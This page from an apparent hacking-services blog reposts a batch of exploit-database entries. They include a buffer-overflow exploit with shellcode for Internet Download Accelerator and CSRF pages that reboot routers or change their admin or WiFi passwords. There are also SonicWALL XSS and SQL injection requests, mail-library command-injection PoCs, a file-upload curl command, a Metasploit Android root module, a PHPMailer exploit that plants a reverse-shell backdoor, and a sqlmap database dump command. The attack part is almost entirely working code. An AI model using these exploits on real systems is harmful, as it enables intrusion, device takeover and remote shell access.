Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863587823

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/python
#
# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 2, 2017
# Vendor Homepage: http://westbyte.com/
# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
# Version: 6.10.1.1527
# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
# --------------
# Internet download accelerator suffers from a BOF when an FTP Download of file with
# long name fails.
# --------------
# To Exploit this issue:
# 1- Run HTTP server that will redirect to the FTP file with long name.
# 2- The ftp server will answer to the commands sent then will open a data connection.
# 3- The script will send an empty file list and close the connection to trigger the BOF condition.
# 5- Happy new year :D.

import SocketServer
import threading


# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work.
ip = "192.168.1.100"
ipParts = ip.split(".")
PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)"
# Run Calc.exe
buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")





class HTTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our HTTP server.

    This is just so we don't have to provide a suspicious FTP link with long name.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        self.data = self.request.recv(1024).strip()
        print "[*] Recieved HTTP Request"
        print "[*] Sending Redirction To FTP"
        # just send back the same data, but upper-cased
	# SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c
	payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
	self.request.sendall("HTTP/1.1 302 Found\r\n" +
	"Host: Server\r\nConnection: close\r\nLocation: "+ 
	payload+
	"\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
	print "[*] Redirection Sent..."

class FTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP server.

    This will work normally and open a data connection with IDA.
    """

    def handle(self):
        # User Command
	self.request.sendall("220 Nasty FTP Server Ready\r\n")
	User = self.request.recv(1024).strip()
        print "[*] Recieved User Command: " + User
	self.request.sendall("331 User name okay, need password\r\n")	
	# PASS Command
        Pass = self.request.recv(1024).strip()
        print "[*] Recieved PASS Command: " + Pass
	self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n")
        # SYST Command
	Syst = self.request.recv(1024).strip()
        print "[*] Recieved SYST Command: " + Syst
	self.request.sendall("215 UNIX Type: L8\r\n")
	# TYPE Command
	Type = self.request.recv(1024).strip()
	print "[*] Recieved Type Command: " + Type
	self.request.sendall("200 Type set to I\r\n")
	# REST command
	Rest = self.request.recv(1024).strip()
	print "[*] Recieved Rest Command: " + Rest
	self.request.sendall("200 OK\r\n")
	# CWD command
	Cwd = self.request.recv(2048).strip()
	print "[*] Recieved CWD Command: " + Cwd
	self.request.sendall("250 CWD Command successful\r\n")
	
	# PASV command.
	Pasv = self.request.recv(1024).strip()
	print "[*] Recieved PASV Command: " + Pasv
	self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n")

	#LIST	
	List = self.request.recv(1024).strip()
	print "[*] Recieved LIST Command: " + List
	self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n")
	
	


class FTPDataHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP Data connection.

    This will send useless response and close the connection to trigger the error.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        print "[*] Recieved FTP-Data Request"
        print "[*] Sending Empty List"
        # just send back the same data, but upper-cased
	self.request.sendall("total 0\r\n\r\n")
	self.request.close()


if __name__ == "__main__":
    HOST, PORT = ip, 8000
    SocketServer.TCPServer.allow_reuse_address = True

    print "[*] Starting the HTTP Server."
    # Create the server, binding to localhost on port 8000
    HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)

    # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data).
    HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
    HTTPThread.daemon = True
    HTTPThread.start()
    
    print "[*] Starting the FTP Server."
    # Running the FTP server.
    FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)

    # Running the FTP server thread.
    FTPThread = threading.Thread(target=FTPServer.serve_forever)
    FTPThread.daemon = True
    FTPThread.start()

    print "[*] Opening the data connection."
    # Opening the FTP data connection - DON'T CHANGE THE PORT.
    FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)

    # Running the FTP Data connection Thread.
    DataThread = threading.Thread(target=FTPData.serve_forever)
    DataThread.daemon = True
    DataThread.start()

    print "[*] Listening for FTP Data."
    # Making the main thread wait.
    print "[*] To exit the script please press any key at any time."
    raw_input()
HireHackking 
Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01


1- Reboot the device
	<html>
		<head>
			<title>CSRF - Reboot the device</title>
		</head>
		<body>
			<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
		</body>
	</html>


2- Change admin account

	<html>
		<head>
			<title>CSRF - Change admin account</title>
		</head>
		<body>
			<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
				<input type="hidden" name="rc" value="@atbox">
				<input type="hidden" name="Pa" value="attacker">
				<input type="hidden" name="p1" value="attacker">
			</form>

			<script type="text/javascript">
				document.forms[0].submit();
			</script>
		</body>
	</html>
HireHackking 
# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T
# Date: 09/08/2016
# Exploit Author: Ayushman Dutta
# Version:  dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454

The Device DPC3941T is vulnerable to CSRF and has no security on the entire
admin panel for it.
Some of the links are at:

<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php

A simple HTML page with javascript on which the attacker lures the victim
can be used to change state in the application.

<html>
<head>
<title>
Lets CSRF Xfinity to change Wifi Password
</title>
</head>
<script>
function jsonreq() {
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
"network_name":"MyName", "wireless_mode":"a,n,ac",
"security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true",
"channel_number":"40", "network_password":"password",
"broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"});
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.open("POST","
http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
true);
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
xmlhttp.send(json_upload);
}
jsonreq();
</script>
</html>
HireHackking 
Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF


Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/secure-mobile-access/
Affected version: 8.1 (SSL-VPN)

Summary: Keep up with the demands of today’s remote workforce. Enable secure
mobile access to critical apps and data without compromising security. Choose
from a variety of scalable secure mobile access (SMA) appliances and intuitive
Mobile Connect apps to fit every size business and budget.

Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize
user-supplied input to several parameters. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session. The WAF was
bypassed via form-based CSRF.

Tested on: SonicWALL SSL-VPN Web Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5392
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php

Firmware fixed: 8.1.0.3
Issue ID: 172692
http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869



26.01.2016

--


Reflected XSS via protocol parameter (GET):
-------------------------------------------

https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:</script><img%20src=a%20onerror=confirm(1)>&bmId=55


XSS via arbitrary parameter (GET):
----------------------------------

https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&<script>alert(2)</script>=zsl


XSS via REMOTEPATH parameter (GET):
-----------------------------------

https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/</script><img%20src=a%20onerror=confirm(3)>&bmId=59


WAF Cross-Site Request Forgery PoC:
-----------------------------------

POST /cgi-bin/editBookmark HTTP/1.1
Host: 127.0.0.1

bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK
HireHackking 
<?php
 
/*
 
Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html


Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------
 
// mail() param injection via the vulnerability in zend-mail


chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);

?>
HireHackking 

Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection


Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/sonicwall-gms/
Affected version: 8.1
                  8.0 SP1 Build 8048.1410
                  Flow Server Virtual Appliance

Fixed in: 8.2 (VR-2016-01-C0V)

Summary: Provide your organization, distributed enterprise or managed
service offering with an intuitive, powerful way to rapidly deploy and
centrally manage SonicWall solutions, with SonicWall GMS. Get more value
from your firewall, secure remote access, anti-spam, and backup and recovery
solutions with enhanced network security monitoring and robust network
security reporting. By deploying GMS in an enterprise, you can minimize
administrative overhead by streamlining security appliance deployment
and policy management.

Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID',
'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being
returned to the user or used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

Tested on: SonicWALL
           MySQL/5.0.96-community-nt
           Apache-Coyote/1.1
           Apache Tomcat 6.0.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5388
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php

Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS


26.01.2016

--


Blind SQL Injection via several parameters:

- searchBySonicwall (GET)
- coDomainID (GET)
- firstChangeOrderID (GET)
- secondChangeOrderID (GET)


PoC:

#1

GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close


#2

GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close


#3

GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close


#4

GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
HireHackking 
# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016
# Software Link: Permium plugin
# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
# Exploit Author: r3m1ck
# Website: https://www.r3m1ck.us/
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"

1. Description

Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.

2. Proof of Concept

curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. Uploaded file location:

Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
ex:
http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info, {
        'Name'           => "Android get_user/put_user Exploit",
        'Description'    => %q{
            This module exploits a missing check in the get_user and put_user API functions
            in the linux kernel before 3.5.5. The missing checks on these functions
            allow an unprivileged user to read and write kernel memory.
                This exploit first reads the kernel memory to identify the commit_creds and
            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
            The exploit was first discovered in the wild in the vroot rooting application.
        },
        'License'        => MSF_LICENSE,
        'Author'         => [
          'fi01',        # libget_user_exploit / libput_user_exploit
          'cubeundcube', # kallsyms_in_memory
          'timwr',       # Metasploit module
        ],
        'References'     =>
        [
          [ 'CVE', '2013-6282' ],
          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
        ],
        'DisclosureDate' => "Sep 06 2013",
        'SessionTypes'   => [ 'meterpreter' ],
        "Platform"       => [ "android", "linux" ],
        'Targets'        => [[ 'Automatic', { }]],
        'Payload'        => { 'Space'    => 2048, },
        'DefaultOptions' =>
        {
          'WfsDelay'     => 120,
          'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
        },
        'DefaultTarget' => 0,
      }
    ))
  end

  def exploit
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
    exploit_data = File.read(local_file, {:mode => 'rb'})

    space = payload_space
    payload_encoded = payload.encoded

    # Substitute the exploit shellcode with our own
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
        'LibraryFilePath' => local_file,
        'TargetFilePath'  => remote_file,
        'UploadLibrary'   => false,
        'Extension'       => false,
        'SaveToDisk'      => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end

end
HireHackking 
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh

os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://localhost:8080'
backdoor = '/backdoor.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
HireHackking 
# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
# Date: 28-12-2016
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
# Exploit Author: Javi Espejo(qemm)
# Contact: http://twitter.com/javiespejo
# Website: http://raipson.com 
# CVE: REQUESTED
# Category: webapps
 
1. Description
   
Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
This the code that has the parameters with the parameters not sanitized 

2. Proof of Concept

option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
   
3. Solution:
   
Update to version 2.6.1 from the update center of joomla.
The Joomla vel publish the vulnerability on
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 
http://awebsupport.com/
HireHackking 
<?php
 
/*
 
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Exploit code URL:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]


which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';

// ------------------
 
// mail() param injection via the vulnerability in SwiftMailer

require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);

// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
  ->setFrom(array($email_from => 'PoC Exploit Payload'))
  ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
  ->setBody('Here is the message itself')
  ;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);

?>
HireHackking 
# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress ­ SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits

1 - Description

An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.


2. Proof of Concept

  sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Parameter: pollid (POST)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: action=spAjaxResults&pollid=2 AND 6034=6034

     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
     Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)

     Type: UNION query
     Title: Generic UNION query (NULL) - 7 columns
     Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO


3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.


4 Impact:

Critical


5. Affected versions:

<= 1.4.1

6. Disclosure Timeline:

21-Dec-2016 ­ found the vulnerability
21-Dec-2016 ­ informed the developer
28-Dec-2016 ­ release date of this security advisory

Not fixed at the date of submitting that exploit.
HireHackking 
#!/usr/bin/env python
#
#
# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
#
#
# Vendor: Patrick Masotta
# Product web page: http://www.vercot.com
# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
#
# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
# on a single exe all of the underlying server protocols and services required by the
# most complex PXE network boot/install scenarios simultaneously delivering Windows and
# non-Windows assets to BIOS and UEFI based targets.
#
# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
# This can be exploited to cause a denial of service attack resulting in application crash.
#
# ----------------------------------------------------------------------------
#
# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
